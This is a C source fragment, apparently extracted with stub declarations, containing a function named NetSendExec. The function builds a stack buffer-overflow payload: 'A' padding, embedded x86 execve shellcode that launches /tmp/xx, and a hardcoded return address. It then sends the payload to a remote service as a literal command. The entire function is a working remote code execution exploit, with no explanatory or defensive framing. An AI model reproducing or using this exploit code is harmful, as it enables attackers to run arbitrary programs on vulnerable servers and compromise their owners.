
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int CS_CODE_LITERALCMD ;
 int CS_DATA_MAX_LEN ;
 int CS_MESG_MAX ;
 int NetSendData (char*) ;
 int SHELLSTART ;
 int SIZEOFBUF ;
 int memcpy (char*,char*,int ) ;
 int memset (char*,int,int) ;
 int sprintf (char*,char*,int,char*) ;
 int strlen (char*) ;
 int strncpy (char*,char*,int) ;

int
NetSendExec(char *arg)
{
  char larg[CS_MESG_MAX];
  char sndbuf[CS_DATA_MAX_LEN];
  char exploitbuf[CS_DATA_MAX_LEN];
  int i;




      char code[] ="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
    "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
    "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/tmp/xx";




 memset(exploitbuf,0x41,229);


 memcpy(exploitbuf+50,code,strlen(code));


 exploitbuf[132]=0xe4;
 exploitbuf[133]=0xeb;
 exploitbuf[134]=0xff;
 exploitbuf[135]=0xbf;

 exploitbuf[229 -1]=0;
 strncpy(larg, exploitbuf, CS_MESG_MAX);
 larg[CS_MESG_MAX - 1] = '\0';







        sprintf(sndbuf, "%i %s\n",
                CS_CODE_LITERALCMD,
                larg
        );
        NetSendData(sndbuf);


 return(0);
}
